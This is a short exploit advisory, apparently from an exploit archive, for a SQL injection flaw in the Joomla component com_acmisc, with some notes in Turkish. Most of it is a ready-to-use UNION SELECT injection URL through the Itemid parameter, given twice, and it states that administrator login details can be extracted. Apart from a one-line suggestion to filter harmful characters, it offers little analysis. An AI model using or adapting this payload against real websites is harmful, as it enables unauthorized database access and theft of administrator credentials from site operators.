28 lines
No EOL
926 B
Text
28 lines
No EOL
926 B
Text
<------------------- header data start ------------------- >
|
|
|
|
#############################################################
|
|
Joomla Component com_acmisc SQL injection Vulnerability
|
|
#############################################################
|
|
|
|
# author : Fl0riX
|
|
|
|
# Name : com_acmisc
|
|
|
|
# Bug Type : SQL Injection
|
|
|
|
# Infection : Admin login bilgileri al�nabilir.
|
|
|
|
# Demo Vuln. :
|
|
http://server/index.php?option=com_acmisc&page=5&Itemid=null/**/union/**/select/**/0,1,version(),3,4,5,6,7,8,9,10,11,12,13,14,15,16/*--
|
|
|
|
# Bug Fix Advice : Zararl� karakterler filtrelenmelidir.
|
|
|
|
#############################################################
|
|
|
|
< ------------------- header data end of ------------------- >
|
|
|
|
< -- bug code start -- >
|
|
|
|
path/index.php?option=com_acmisc&page=5&Itemid=null/**/union/**/select/**/0,1,version(),3,4,5,6,7,8,9,10,11,12,13,14,15,16/*--
|
|
|
|
< -- bug code end of -- > |